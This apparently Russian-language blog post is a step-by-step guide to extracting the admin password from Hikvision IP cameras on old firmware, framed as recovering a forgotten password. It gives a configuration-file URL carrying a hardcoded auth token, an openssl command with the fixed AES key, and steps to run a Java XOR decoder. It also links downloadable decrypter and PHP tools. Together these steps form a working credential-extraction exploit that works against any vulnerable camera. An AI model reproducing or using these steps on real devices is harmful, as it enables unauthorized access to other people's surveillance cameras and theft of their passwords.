Hikvision XOR Decrypter. Взлом камеры Hikvision

Получение файла конфигурации Hikvision

Если вы забыли пароль к камере Hikvision со старой прошивкой, воспользуйтесь этой ссылкой, чтобы получить файл конфигурации камеры:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
Просто не забудьте заменить camera.ip на IP-адрес камеры.

Расшифровка AES в файле конфигурации

Для этого необходимо установить ОС Linux Ubuntu .
Инструкция по установке https://saniaowner.space/2019/10/05/ustanovka-ubuntu-server-18-04/
После нужно установить OpenSSL. В последних дистрибутивах он уже предустановлен по умолчанию, потому нет необходимости
Для тех кто любит все делать самостоятельно:
Установка OpenSSL в Ubuntu https://cloudwafer.com/blog/installing-openssl-on-ubuntu-16-04-18-04/

Скачиваем архив по ссылке https://cdn.saniaowner.space/cctv/ip_camera/2020/11.02/hikvision-xor-decrypter-master.zip
Создаем папку и копируем туда два файла:
1. Файл конфигурации Hikvision который получили с камеры. Он имеет название configurationFile
2. Файл XORDecode.java что находится в архиве

После этого запускаем терминал и вводим следующие команды:
cd /var/www/html/hik_reset
Команда перехода в директорию где находятся файлы. У Вас она может иметь другое расположение.

openssl enc -d -in configurationFile -out decryptedoutput -aes-128-ecb -K 279977f62f6cfd2d91cd75b889ce0c9a -nosalt -md md5
Команда нарушения шифрования AES в файле конфигурации

После отработки команды в папке появится еще один файл с названием decryptedoutput. Как и предыдущий файл, он не будет иметь расширение.

После запускаем команду javac XORDecode.java
В результате создается файл XORDecode.class

Запускаем команду java XORDecode
В результате создается файл plaintextOutput

Файл plaintextOutput можно открыть используя HEX редактор.
Это может быть как автономный https://www.softportal.com/software-4031-hex-editor.html так и онлайн https://hexed.it/ редактор.
Нужно открыть файл decryptedoutput редактором, затем нажать комбинацию клавиш Ctrl+F, в окне поиска ввести admin

В результате будет найдено 2 совпадения, нужно использовать второе. Пароль будет в открытом виде

Как видите пароль Admin123456

Чтобы упростить все выше перечисленное я создал онлайн вариант программы Способ 3 который доступен по ссылке

https://saniaowner.space/2019/12/13/hikvision-sbros-parolya/

Информация была взята с Github https://github.com/WormChickenWizard/hikvision-xor-decrypter

Также выкладываю php код который реализован на странице https://saniaowner.space/2019/12/13/hikvision-sbros-parolya/

Скачать https://cdn.saniaowner.space/cctv/ip_camera/2020/11.02/hik_reset.zip